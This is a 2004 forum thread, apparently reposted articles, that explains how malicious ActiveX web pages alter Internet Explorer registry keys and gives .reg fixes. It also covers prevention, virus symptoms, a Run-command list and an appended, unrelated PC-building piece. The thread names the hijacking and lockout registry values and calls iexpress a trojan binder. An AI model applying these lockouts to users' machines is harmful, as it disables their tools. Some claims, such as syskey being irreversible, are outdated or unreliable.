Q版蹦牙囝
初級會員





積分 86
發貼 58
註冊 2004-6-9
狀態 線上 剖析惡意網頁修改註冊表的十二種現象

剖析惡意網頁修改註冊表的十二種現象

近來,屢屢發生網友在瀏覽網頁時,造成註冊表被修改,使得IE預設連線首頁、標題欄及IE右鍵選單被改為瀏覽網頁時的位址(多為廣告訊息),更有甚者使瀏覽者的電腦在啟動時出現一個提示視窗顯示自己的廣告,而且有愈演愈烈之勢,遇到這種情況我們該怎樣辦呢?


一、註冊表被修改的原因及解決辦法

  其實,該惡意網頁是含有有害代碼的ActiveX網頁檔案,這些廣告訊息的出現是因為瀏覽者的註冊表被惡意變更的結果。

  1、IE預設連線首頁被修改

  IE瀏覽器上方的標題欄被改成「歡迎訪問……網站」的型態,這是最常見的篡改手段,受害者眾多。

  受到變更的註冊表項目為:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page

  通過修改「Start Page」的鍵值,來達到修改瀏覽者IE預設連線首頁的目的,如瀏覽「萬花谷」就會將你的IE預設連線首頁修改為「http://on888.home.chinaren.com 」,即便是出於給自己的主頁做廣告的目的,也顯得太霸道了一些,這也是這類網頁惹人厭惡的原因。

  解決辦法:

  1在Windows啟動後,點擊「開始」→「執行」選單項,在「開啟」欄中鍵入regedit,然後按「確定」鍵;

  2展開註冊表到

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main

  下,在右半部分視窗中找到串值「Start Page」按兩下 ,將Start Page的鍵值改為「about:blank」即可;

  3同理,展開註冊表到

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main

  在右半部分視窗中找到串值「Start Page」,然後按2中所述方法處理。

  4離開註冊表編輯器,重新啟動電腦,一切OK了!

  特殊例子:當IE的起始頁變成了某些網址後,就算你通過選項設定修改好了,重啟以後又會變成他們的網址啦,十分的難纏。其實他們是在你機器裡加了一個自執行程式,它會在系統啟動時將你的IE起始頁設成他們的網站。

  解決辦法:執行註冊表編輯器regedit.exe,然後依次展開

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run

  主鍵,然後將其下的registry.exe子鍵移除,然後移除自執行程式c:\Program Files\registry.exe,最後從IE選項中重新設定起始頁就好了。


2、篡改IE的預設頁

  有些IE被改了起始頁後,即使設定了「使用預設頁」仍然無效,這是因為IE起始頁的預設頁也被篡改啦。具體說來就是以下註冊表項被修改:

HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\
Main\Default_Page_URL

  「Default_Page_URL」這個子鍵的鍵值即起始頁的預設頁。

  解決辦法:

  執行註冊表編輯器,然後展開上述子鍵,將「Default_Page_UR」子鍵的鍵值中的那些篡改網站的網址改掉就好了,或是設定為IE的預設值。

  3、修改IE瀏覽器預設主頁,並且鎖定設定項,禁止使用者變更回來。

  主要是修改了註冊表中IE設定的下面這些鍵值(DWORD值為1時為不可選):

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"Settings"=dword:1

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"Links"=dword:1

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"SecAddSites"=dword:1

  解決辦法:

  將上面這些DWORD值改為「0」即可恢復功能。

  4、IE的預設首頁灰色按扭不可選

  這是由於註冊表HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel

  下的DWORD值「homepage」的鍵值被修改的緣故。原來的鍵值為「0」,被修改為「1」(即為灰色不可選狀態)。

  解決辦法:

  將「homepage」的鍵值改為「0」即可。

5、IE標題欄被修改

  在系統預設狀態下,是由套用程式本身來提供標題欄的訊息,但也容許使用者自行在上述註冊表項目中填加訊息,而一些惡意的網站正是利用了這一點來得逞的:它們將串值Window Title下的鍵值改為其網站名或更多的廣告訊息,從而達到改變瀏覽者IE標題欄的目的。

  具體說來受到變更的註冊表項目為:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title

  解決辦法:

  1在Windows啟動後,點擊「開始」→「執行」選單項,在「開啟」欄中鍵入regedit,然後按「確定」鍵;

  2展開註冊表到

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main

  下,在右半部分視窗中找到串值「Window Title」 ,將該串值移除即可,或將Window Title的鍵值改為「IE瀏覽器」等你喜歡的名字;

  3同理,展開註冊表到

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main

  然後按2中所述方法處理。

  4離開註冊表編輯器,重新啟動電腦,執行IE,你會發現困擾你的問題解決了!

  6、IE右鍵選單被修改

  受到修改的註冊表項目為:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt

  下被新增了網頁的廣告訊息,並由此在IE右鍵選單中出現!

  解決辦法:

  開啟註冊標編輯器,找到

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt

  移除關聯的廣告條文即可,注意不要把下載軟體FlashGet和Netants也移除掉啊,這兩個可是「標準」的呀,除非你不想在IE的右鍵選單中見到它們。

7、IE預設搜尋引擎被修改

  在IE瀏覽器的工具列中有一個搜尋引擎的工具按鈕,可以實現網路搜尋,被篡改後只要點擊那個搜尋工具按鈕就會連結到那個篡改網站。出現這種現象的原因是以下註冊表被修改:

HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch

HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant

  解決辦法:

  執行註冊表編輯器,依次展開上述子鍵,將「CustomizeSearch」和「SearchAssistant」的鍵值改為某個搜尋引擎的網址即可。

  8、系統啟動時跳出對話框

  受到變更的註冊表項目為:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon

  在其下被建立了字串「LegalNoticeCaption」和「LegalNoticeText」,其中「LegalNoticeCaption」是提示框的標題,「LegalNoticeText」是提示框的文字內容。由於它們的存在,就使得我們每次登陸到Windwos桌面前都出現一個提示視窗,顯示那些網頁的廣告訊息!你瞧,多討厭啊!

  解決辦法:

  開啟註冊表編輯器,找到

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon

  這一個主鍵,然後在右邊視窗中找到「LegalNoticeCaption」和「LegalNoticeText」這兩個字串,移除這兩個字串就可以解決在登陸時出現提示框的現象了。

  9、瀏覽網頁註冊表被禁用

  這是由於註冊表

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

  下的DWORD值「DisableRegistryTools」被修改為「1」的緣故,將其鍵值恢復為「0」即可恢復註冊表的使用。

  解決辦法

  用記事本程式建立以REG為後綴名的檔案,將下面這些內容複製在其中就可以了:

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
「DisableRegistryTools」=dword:00000000

 10、瀏覽網頁開始選單被修改

  這是最「狠」的一種,讓瀏覽者有生不如死的感覺。瀏覽後不僅有類似上面所說的那些症狀,還會有以下更悲慘的遭遇:

  1)禁止「關機」
  2)禁止「執行」
  3)禁止「註銷」
  4)隱藏C盤——你的C盤找不到了!
  5)禁止使用註冊表編輯器regedit
  6)禁止使用DOS程式
  7)使系統無法進入「實模式」
  8)禁止執行任何程式

  具體的原因和解決辦法請看天極網e企業之安全之路欄位的這篇文章:《瀏覽網頁註冊表被修改之迷及解決辦法》。

  以上是比較常見的修改瀏覽者註冊表的現象,今天在瀏覽網頁時,無意中來到某個個人網站,又遇到了以前沒有碰到過的問題:

  11、IE中滑鼠右鍵失效

  瀏覽網頁後在IE中滑鼠右鍵失效,點擊右鍵沒有任何反應!

  12、檢視「「源檔案」選單被禁用

  在IE視窗中點擊「檢視」→「源檔案」,發現「源檔案」選單已經被禁用。



  我在瀏覽網頁時並沒有注意到上面這兩個問題,因為當時正好朋友叫我有事,於是我就離開電腦了,晚上吃完飯開啟電腦連線上網,就發現IE中滑鼠右鍵失效,「檢視」選單中的「源檔案」被禁用。不能檢視源檔案也就罷了,但是無法使用滑鼠右鍵真是太不方便了。得想個辦法!

  找出最新版的超級兔子魔法設定試試吧,呀!不能解決!看來是個新問題,不過自己好歹也是「老革命」了,這點問題應該難不住我。於是到註冊表中一番搜尋,經由一番尋找終於弄明白了問題的所在。

原來,惡意網頁修改了我的註冊表,具體的位置為:

  在註冊表

HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer

  下建立子鍵「Restrictions」,然後在「Restrictions」下面建立兩個DWORD值:「NoViewSource」和「NoBrowserContextMenu」,並為這兩個DWORD值賦值為「1」。

  在註冊表

HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions

  下,將兩個DWORD值:「NoViewSource」和「NoBrowserContextMenu」的鍵值都改為了「1」。

  通過上面這些鍵值的修改就達到了在IE中使滑鼠右鍵失效,使「檢視」選單中的「源檔案」被禁用的目的。要向你說明的是第2點中提到的註冊表其實相當於第1點中提到的註冊表的分支,修改第1點中所說的註冊表鍵值,第2點中註冊表鍵值隨之改變。

  解決辦法:

  明白了道理,問題解決起來就容易多了,具體解決辦法為:將以下內容另存為後綴名為reg的註冊表檔案,比方說unlock.reg,按兩下unlock.reg匯入註冊表,不用重啟電腦,重新執行IE就會發現IE的功能恢復標準了。

REGEDIT4

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
「NoViewSource」=dword:00000000
"NoBrowserContextMenu"=dword:00000000

[HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions]
「NoViewSource」=dword:00000000
「NoBrowserContextMenu」=dword:00000000

  要特別注意的是,在你編製的註冊表檔案unlock.reg中,「REGEDIT4」一定要大寫,並且它的後面一定要空一行,還有,「REGEDIT4」中的「4」和「T」之間一定不能有空格,否則將前功盡棄!許多朋友寫註冊表檔案之所以不成功,就是因為沒有注意到上面所說的內容,這回該注意點嘍。請注意若果你是Win2000或WinXP使用者,請將「REGEDIT4」改為Windows Registry Editor Version 5.00。

2004-6-12 04:34 PM

Q版蹦牙囝
初級會員





積分 86
發貼 58
註冊 2004-6-9
狀態 線上 二、預防辦法

  1、要避免中招,關鍵是不要輕易去一些自己並不瞭解的站台,特別是那些看上去美麗誘人的網址更不要貿然前往,否則吃虧的往往是你。

  2、由於該類網頁是含有有害代碼的ActiveX網頁檔案,因此在IE設定中將ActiveX外掛和控件、Java腳本等全部禁止就可以避免中招。

  具體方法是:在IE視窗中點擊「工具→Internet選項,在跳出的對話框中選取「安全」標籤,再點擊「自訂層級」按鈕,就會跳出「安全設定」對話框,把其中所有ActiveX外掛和控件以及Java關聯全部選取「禁用」即可。不過,這樣做在以後的網頁瀏覽過程中可能會造成一些標準使用ActiveX的網站無法瀏覽。唉,有利就有弊,你還是自己看著辦吧。

  3、對於Windows98使用者,請開啟C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把其中的「ActiveXComponent.class」刪掉;對於WindowsMe使用者,請開啟
C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP,把其中的「ActiveXComponent.class」刪掉。請放心,移除這個元件不會影響到你標準瀏覽網頁的。

  4、對於所有使用者,都建議安裝Norton AntiVirus 2002 v8.0掃毒軟體,此軟體已經把通過IE修改註冊表的代碼定義為Trojan.Offensive ,增加了Script Blocking功能,它將對此類惡作劇進行監控,並予以攔截。

  另外,下載超級兔子魔法設定軟體後安裝,若果出現問題,可以用它來恢復。不過,「兔子」對於我們在上面所說的惡意網頁使得IE中滑鼠右鍵失效,「檢視」選單中的「源檔案」被禁用這兩種現象無法恢復。

  5、既然這類網頁是通過修改註冊表來破壞我們的系統,那麼我們可以事先把註冊表加鎖:禁止修改註冊表,這樣就可以達到預防的目的。不過,自己要使用註冊表編輯器regedit.exe該怎麼辦呢?因此我們還要在此前事先準備一把「鑰匙」,以便開啟這把「鎖」!

  加鎖方法如下:

  (1)執行註冊表編輯器regedit.exe;

  (2)展開註冊表到

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

  下,新增一個名為DisableRegistryTools的DWORD值,並將其值改為「1」,即可禁止使用註冊表編輯器regedit.exe。

  解鎖方法如下:

  用記事本編輯一個任意名字的.reg檔案,比如unlock.reg,內容如下:

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
「DisableRegistryTools」=dword:00000000

  存盤,你就有了一把解鎖的鑰匙了!若果要使用註冊表編輯器,則按兩下unlock.reg即可。請注意若果你是Win2000或WinXP使用者,請將「REGEDIT4」寫為Windows Registry Editor Version 5.00。



  6、對Win2000使用者,還可以通過在Win2000下把服務裡面的遠端註冊表動作服務「Remote Registry Service」禁用,來對付該類網頁。具體方法是:點擊「管理工具→服務→Remote Registry Service(容許遠端註冊表動作)」,將這一項禁用即可。

  7、若果覺得手動修改註冊表太危險,可以下載如下reg檔案,按兩下之可恢復被修改的註冊表。

  8、雖然經由一番辛苦的勞動修改回了標題和預設連線首頁,但若果以後又不小心進入該站就又得麻煩一次。其實,你可以在IE中做一些設定以便永遠不進該站台:

  開啟IE,點擊「工具」→「Internet選項」→「內容」→「分級審查」,點「啟用」按鈕,會調出「分級審查」對話框,然後點擊「許可站台」標籤,輸入不想去的網站網址,如輸入:
http://on888.home.chinaren.com,按「永不」按鈕,再點擊「確定」即大功告成!

  9、升級你的IE為6.0版本,可以有效防範上面這些症狀。

  10、下載微軟最新的Microsoft Windows Script 5.6,可以預防上面所說的現象,更可預防目前流行的、可惡的混客絕情炸彈。 (選自yesky

2004-6-12 04:35 PM

Q版蹦牙囝
初級會員





積分 86
發貼 58
註冊 2004-6-9
狀態 線上 如何判斷是否中毒

如何判斷是否中毒


各種病毒時至今日也可算是百花齊放了,搞得人心惶惶,一旦發現自己的電腦有點異常就認定是病毒在作怪,到處找掃毒軟體,一個不行,再來一個,總之似乎不找到「元兇」誓不罷休一樣,結果病毒軟體是用了一個又一個,或許為此人民幣是用了一張又一張,還是未見「元兇」的蹤影,其實這未必就是病毒在作怪。
  這樣的例子並不少見,特別是對於一些初級電腦使用者。下面我就結合個人電腦使用及企業網路維護方面的防毒經驗從以下幾個方面給大家介紹介紹如何判斷是否中了病毒,希望對幫助識別「真毒」有一定幫助!
  病毒與軟、硬體故障的區別和聯繫
  電腦出故障不只是因為感染病毒才會有的,個人電腦使用過程中出現各種故障現象多是因為電腦本身的軟、硬體故障引起的,網路上的多是由於權限設定所致。我們只有充分地瞭解兩者的區別與聯繫,才能作出正確的判斷,在真正病毒來了之時才會及時發現。下面我就簡要列出了分別因病毒和軟、硬體故障引起的一些常見電腦故障症狀分析。
  症狀 病毒的入侵的可能性 軟、硬體故障的可能性
  經常死機:病毒開啟了許多檔案或佔用了大量記憶體;不穩定(如記憶體質量差,硬體超頻效能差等);執行了大容量的軟體佔用了大量的記憶體和磁碟空間;使用了一些測試軟體(有許多BUG);硬碟空間不夠等等;執行網路上的軟體時經常死機也許是由於網路速度太慢,所執行的程式太大,或是自己的工作站硬體組態太低。
  系統無法啟動:病毒修改了硬碟的引導訊息,或移除了某些啟動檔案。如引導型病毒引導檔案損壞;硬碟損壞或參數設定不正確;系統檔案人為地誤移除等。
  檔案打不開:病毒修改了檔案格式;病毒修改了檔案連結位置。檔案損壞;硬碟損壞;檔案捷徑對應的連結位置發生了變化;原來編輯檔案的軟體移除了;若果是在局域網中多表現為伺服器中檔案存放位置發生了變化,而工作站沒有及時涮新服器的內容(長時間開啟了資源管理器)。
  經常報告記憶體不夠:病毒非法佔用了大量記憶體;開啟了大量的軟體;執行了需記憶體資源的軟體;系統組態不正確;記憶體本就不夠(目前基本記憶體要求為128M)等。
  提示硬碟空間不夠:病毒複製了大量的病毒檔案(這個遇到過好幾例,有時好端端的近10G硬碟安裝了一個WIN98或WINNT4.0系統就說沒空間了,一安裝軟體就提示硬碟空間不夠。硬碟每個分區容量太小;安裝了大量的大容量軟體;所有軟體都集中安裝在一個分區之中;硬碟本身就小;若果是在局域網中系統管理員為每個使用者設定了工作站使用者的「私人盤」使用空間限制,因檢視的是整個網路盤的大小,其實「私人盤」上容量已用完了。
  軟碟等裝置未訪問時出讀寫信號:病毒感染;軟碟取走了還在開啟曾經在軟碟中開啟過的檔案。
  出現大量來歷不明的檔案:病毒複製檔案;可能是一些軟體安裝中產生的暫存檔;也或許是一些軟體的組態訊息及執行記錄。
  啟動黑屏:病毒感染(記得最深的是98年的4.26,我為CIH付出了好幾千元的代價,那天我第一次開機到了Windows畫面就死機了,第二次再開機就什麼也沒有了);顯示器故障;顯示卡故障;主板故障;超頻過度;CPU損壞等等
  資料丟失:病毒移除了檔案;硬碟扇區損壞;因恢復檔案而覆蓋原檔案;若果是在網路上的檔案,也可能是由於其它使用者誤移除了。
  鍵盤或滑鼠無端地鎖死:病毒作怪,特別要留意「木馬」;鍵盤或滑鼠損壞;主板上鍵盤或滑鼠接口損壞;執行了某個鍵盤或滑鼠鎖定程式,所執行的程式太大,長時間系統很忙,表現出按鍵盤或滑鼠不起作用。
  系統執行速度慢:病毒佔用了記憶體和CPU資源,在後台執行了大量非法動作;硬體組態低;開啟的程式太多或太大;系統組態不正確;若果是執行網路上的程式時多數是由於你的機器組態太低造成,也有可能是此時網路上忙線中,有許多使用者同時開啟一個程式;還有一種可能就是你的硬碟空間不夠用來執行程式時作臨時交換資料用。
  系統自動執行動作:病毒在後台執行非法動作;使用者在註冊表或啟動群組中設定了有關程式的自動執行;某些軟體安裝或升級後需自動重啟系統。
  通過以上的分析對比,我們知道其實大多數故障都可能是由於人為或軟、硬體故障造成的,當我們發現異常後不要急於下斷言,在掃毒還不能解決的情況下,應仔細分析故障的特徵,排除軟、硬體及人為的可能性。
  病毒的分類及各自的特徵
  要真正地識別病毒,及時的查殺病毒,我們還有必要對病毒有一番較詳細的瞭解,而且越詳細越好!
  病毒因為由眾多分散的個人或群組織單獨編寫,也沒有一個標準去衡量、去劃分,所以病毒的分類可按多個角度大體去分。
  如按傳染對像來分,病毒可以劃分為以下幾類:
  a、引導型病毒
  這類病毒攻擊的對象就是磁碟的引導扇區,這樣就能使系統在啟動時獲得優先的執行權,從而達到控制整個系統的目的,這類病毒因為感染的是引導扇區,所以造成的損失也就比較大,一般來說會造成系統無法標準啟動,但查殺這類病毒也較容易,多數掃毒軟體都能查殺這類病毒,如KV300、KILL系列等。
  b、檔案型病毒
  早期的這類病毒一般是感染以exe、com等為副檔名的可執行檔案,這樣的話當你執行某個可執行檔案時病毒程式就跟著啟用。近期也有一些病毒感染以dll、ovl、sys等為副檔名的檔案,因為這些檔案通常是某程式的組態、連結檔案,所以執行某程式時病毒也就自動被子加載了。它們加載的方法是通過插入病毒代碼整段落或分散插入到這些檔案的空白位元組中,如CIH病毒就是把自己分割成9段內嵌到PE結構的可執行檔案中,感染後通常檔案的位元組數並不見增加,這就是它的隱蔽性的一面。
  c、網路型病毒
  這種病毒是近幾來網路的高速發展的產物,感染的對象不再局限於單一的模式和單一的可執行檔案,而是更加綜合、更加隱蔽。現在一些網路型病毒幾乎可以對所有的OFFICE檔案進行感染,如WORD、EXCEL、電子信件等。其攻擊模式也有轉變,從原始的移除、修改檔案到現在進行檔案加密、竊取使用者有用訊息(如黑客程式)等,傳播的途經也發生了質的飛躍,不再局限磁碟,而是通過更加隱蔽的網路進行,如電子信件、電子廣告等。
  d、復合型病毒
  把它歸為「復合型病毒」,是因為它們同時具備了「引導型」和「檔案型」病毒的某些特點,它們即可以感染磁碟的引導扇區檔案,也可以感染某此可執行檔案,若果沒有對這類病毒進行全面的清除,則殘留病毒可自我恢復,還會造成引導扇區檔案和可執行檔案的感染,所以這類病毒查殺難度極大,所用的掃毒軟體要同時具備查殺兩類病毒的功能。
  以上是按照病毒感染的對象來分,若果按病毒的破壞程度來分,我們又可以將病毒劃分為以下幾種:
  a、良性病毒:
  這些病毒之所以把它們稱之為良性病毒,是因為它們入侵的目的不是破壞你的系統,只是想玩一玩而已,多數是一些初級病毒發燒友想測試一下自己的開發病毒程式的水平。它們並不想破壞你的系統,只是發出某種音效,或出現一些提示,除了佔用一定的硬碟空間和CPU處理時間外別無其它壞處。如一些木馬病毒程式也是這樣,只是想竊取你電腦中的一些通信訊息,如密碼、IP位址等,以備有需要時用。
  b、惡性病毒
  我們把只對軟體系統造成干擾、竊取訊息、修改系統訊息,不會造成硬體損壞、資料丟失等嚴重後果的病毒歸之為「惡性病毒」,這類病毒入侵後系統除了不能標準使用之外,別無其它損失,系統損壞後一般只需要重裝系統的某個部分檔案後即可恢復,當然還是要殺掉這些病毒之後重裝系統。
  c、極惡性病毒
  這類病毒比上述b類病毒損壞的程度又要大些,一般若果是感染上這類病毒你的系統就要徹底崩潰,根本無法標準啟動,你保分留在硬碟中的有用資料也可能隨之不能取得,輕一點的還只是移除系統檔案和套用程式等。
  d、災難性病毒
  這類病毒從它的名字我們就可以知道它會給我們帶來的破壞程度,這類病毒一般是破壞磁碟的引導扇區檔案、修改檔案分配表和硬碟分區表,造成系統根本無法啟動,有時甚至會格式化或鎖死你的硬碟,使你無法使用硬碟。若果一旦染上這類病毒,你的系統就很難恢復了,保留在硬碟中的資料也就很難取得了,所造成的損失是非常巨大的,所以我們進化論什麼時候應作好最壞的打算,特別是針對企業使用者,應充分作好災難性備份,還好現在大多數大型企業都已認識到備份的意義所在,花巨資在每天的系統和資料備份上,雖然大家都知道或許幾年也不可能遇到過這樣災難性的後果,但是還是放鬆這「萬一」。我所在的雀巢就是這樣,而且還非常重視這個問題。如98年4.26發作的CIH病毒就可劃歸此類,因為它不僅對軟體造成破壞,更直接對硬碟、主板的BIOS等硬體造成破壞。
  如按其入侵的模式來分為以下幾種:
  a、源代碼內嵌攻擊型
  從它的名字我們就知道這類病毒入侵的主要是進階語系的源程式,病毒是在源程式編譯之前插入病毒代碼,最後隨源程式一起被編譯成可執行檔案,這樣剛生成的檔案就是帶毒檔案。當然這類檔案是極少數,因為這些病毒開發者不可能輕易得到那些軟體開發公司編譯前的源程式,況且這種入侵的模式難度較大,需要非常專業的寫程式水平。
  b、代碼取代攻擊型
  這類病毒主要是用它自身的病毒代碼取代某個入侵程式的整個或部分模組,這類病毒也少見,它主要是攻擊特定的程式,針對性較強,但是不易被發現,清除起來也較困難。
  c、系統修改型
  這類病毒主要是用自身程式覆蓋或修改系統中的某些檔案來達到呼叫或替代動作系統中的部分功能,由於是直接感染系統,危害較大,也是最為多見的一種病毒類型,多為檔案型病毒。
  d、外殼附加型
  這類病毒通常是將其病毒附加在標準程式的頭部或尾部,相當於給程式加入了一個外殼,在被感染的程式執行時,病毒代碼先被執行,然後才將標準程式調入記憶體。目前大多數檔案型的病毒屬於這一類。
  有了病毒的一些基本知識後現在我們就可以來檢查你的電腦中是否含有病毒,要知道這些我們可以按以下幾個方法來判斷。
  1、反病毒軟體的掃瞄法
  這恐怕是我們絕大數朋友偏好,也恐怕是唯一的選取,現在病毒種類是越來越多,隱蔽的手段也越來越高明,所以給查殺病毒帶來了新的難度,也給反病毒軟體開發商帶來挑戰。但隨著電腦程式開發語系的技術性提高、電腦網路越來越普及,病毒的開發和傳播是越來越容易了,因而反病毒軟體開發公司也是越來越多了。但目前比較有名的還是那麼幾個系統的反病毒軟體,如金山毒霸、KV300、KILL、PC-cillin、VRV、瑞星、諾頓等。至於這些反病毒軟體的使用在此就不必說敘了,我相信大家都有這個水平!
  2、觀察法
  這一方法只有在瞭解了一些病毒發作的症狀及常棲身的地方才能準確地觀察到。如硬碟引導時經常出現死機、系統引導時間較長、執行速度很慢、不能訪問硬碟、出現特殊的音效或提示等上述在第一大點中出現的故障時,我們首先要考慮的是病毒在作怪,但也不能一條胡洞走到底,上面我不是講了軟、硬體出現故障同樣也可能出現那些症狀嘛!對於如屬病毒引起的我們可以從以下幾個方面來觀察:
  a、記憶體觀察
  這一方法一般用在DOS下發現的病毒,我們可用DOS下的「mem/c/p」指令來檢視各程式佔用記憶體的情況,從中發現病毒佔用記憶體的情況(一般不單獨佔用,而是依附在其它程式之中),有的病毒佔用記憶體也比較隱蔽,用「mem/c/p」發現不了它,但可以看到總的基本記憶體640K之中少了那麼區區1k或幾K。
  b、註冊表觀察法
  這類方法一般適用於近來出現的所謂黑客程式,如木馬程式,這些病毒一般是通過修改註冊表中的啟動、加載組態來達到自動啟動或加載的,一般是在如下幾個地方實現:

  [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion

    c、系統組態檔觀察法
  這類方法一般也是適用於黑客類程式,這類病毒一般在隱藏在system.ini 、wini.ini(Win9x/WinME)和啟動群組中,在system.ini檔案中有一個"shell=」項,而在wini.ini檔案中有「load= 」、「run= 」項,這些病毒一般就是在這些項目中加載它們自身的程式的,注意有時是修改原有的某個程式。我們可以執行Win9x/WinME中的msconfig.exe程式來一項一項檢視

開始-執行 指令集

winver---------檢查Windows版本

  wmimgmt.msc----開啟windows管理體系結構(WMI)

  wupdmgr--------windows更新程式

  wscript--------windows腳本宿主設定

  write----------寫字板

  winmsd---------系統訊息

  wiaacmgr-------掃瞄器和照相機精靈

  winchat--------XP自帶局域網聊天

  mem.exe--------顯示記憶體使用情況

  Msconfig.exe---系統組態實用程式

  mplayer2-------簡易widnows media player

  mspaint--------畫圖板

  mstsc----------遠端桌面連線

  mplayer2-------媒體播放機

  magnify--------放大鏡實用程式

  mmc------------開啟控制台

  mobsync--------同步指令

  dxdiag---------檢查DirectX訊息

  drwtsn32------ 系統醫生

  devmgmt.msc--- 裝置管理器

  dfrg.msc-------磁碟碎片整理程式

  diskmgmt.msc---磁碟管理實用程式

  dcomcnfg-------開啟系統元件服務

  ddeshare-------開啟DDE共享設定

  dvdplay--------DVD播放器

  net stop messenger-----停止信使服務

  net start messenger----開始信使服務

notepad--------開啟記事本

  nslookup-------網路管理的工具精靈

  ntbackup-------系統備份和復原

  narrator-------螢幕「講述人」

  ntmsmgr.msc----移動存儲管理器

  ntmsoprq.msc---移動存儲管理員動作請求

  netstat -an----(TC)指令檢查接口

  syncapp--------建立一個公事包

  sysedit--------系統組態編輯器

  sigverif-------檔案簽名驗證程式

  sndrec32-------錄音機

  shrpubw--------建立共享資料夾

  secpol.msc-----近端安全策略

  syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼

  services.msc---近端服務設定

  Sndvol32-------音量控制程式

  sfc.exe--------系統檔案檢查器

  sfc /scannow---windows檔案保護

  tsshutdn-------60秒倒計時關機指令

  tourstart------xp簡介(安裝完成後出現的漫遊xp程式)

  taskmgr--------任務管理器
eventvwr-------事件檢視器

  eudcedit-------造字程式

  explorer-------開啟資源管理器

  packager-------對像包裝程式

  perfmon.msc----電腦效能監測程式

  progman--------程式管理器

  regedit.exe----註冊表

  rsop.msc-------群組策略結果集

  regedt32-------註冊表編輯器

  rononce -p ----15秒關機

  regsvr32 /u *.dll----停止dll檔案執行

  regsvr32 /u zipfldr.dll------取消ZIP支援

  cmd.exe--------CMD指令提示符

  chkdsk.exe-----Chkdsk磁碟檢查

  certmgr.msc----證書管理實用程式

  calc-----------啟動計算器

  charmap--------啟動字元映射表

  cliconfg-------SQL SERVER 用戶端網路實用程式

  Clipbrd--------剪貼簿檢視器

  conf-----------啟動netmeeting

  compmgmt.msc---電腦管理

  cleanmgr-------垃圾整理

  ciadv.msc------索引服務程式

  osk------------開啟螢幕鍵盤

  odbcad32-------ODBC資料源管理器

  oobe/msoobe /a----檢查XP是否啟用

  lusrmgr.msc----本機使用者和群組

  logoff---------註銷指令

  iexpress-------木馬捆綁工具,系統自帶

  Nslookup-------IP位址偵測器

  fsmgmt.msc-----共享資料夾管理器

  utilman--------輔助工具管理器

  gpedit.msc-----群組策略

DIY電腦裝機10大錯誤觀念

不少消費者在裝機時往往存在某些概念性錯誤,這會直接導致投資浪費,或是出現安全隱患。對於初次涉足裝機的讀者而言,瞭解一下常見的概念性錯誤將大有裨益,或許你心中的不少心結也將被解開。

  DIY裝機的穩定性不好





  在很多使用者的心目中,似乎DIY相容機總是背負著「穩定性不佳」的莫須有罪名。事實上,如今PC的生產已經實現了高度配套化,很多品牌機廠商所做的也僅僅是群組裝,然後便是嚴格的穩定性測試。更為重要的是,在製作工藝飛速發展之下,硬體整合度越來越高,PC內定的架構已經遠不如以往那樣複雜,群組裝PC的技術含量也大幅度下降。

  可以負責地說,DIY裝機並不等於穩定性不好。只要產品質量過關,群組合得當,那麼其穩定性完全可以媲美於品牌機。當然,這一前提條件是大家不能忽視的。部分商家為了牟取暴利而千萬百計地使用劣質產品,這直接損害了相容機的形象。從本質上說,「相容機」這一名稱或許並不合適,因為DIY裝機並無所謂「相容」之說。採用與品牌機相同的配件,甚至效能還更上一層樓,此時相容性與品牌機沒有任何區別。更為重要的是,在DIY裝機之風日益盛行之後,它反倒體現出一定的相容性優勢,各個配件之間可以很方便地協調工作。反觀品牌機,各種獨立設計令今後的升級非常不便,最典型的例子莫過於品牌機主板需要特殊擋板以及品牌機需要私人某一品牌的記憶體等等。

  AMD處理器功耗太大





  或許是AMD的市場宣傳力度不夠,很多消費者一聽到AMD就聯想起巨大的功耗以及令人不敢恭維的相容性。然而正如很多資深DIY使用者所知道的那樣,Athlon XP處理器在功耗方面並不見得比Pentium 4高多少。而在發熱量方面,Athlon XP並非如很多使用者想像中那樣厲害。由於採用了更為先進的銅連線製程,因此Athlon XP的耐高溫能力遠高於Pentium 4,一般工作在60度以下是絕對安全的。

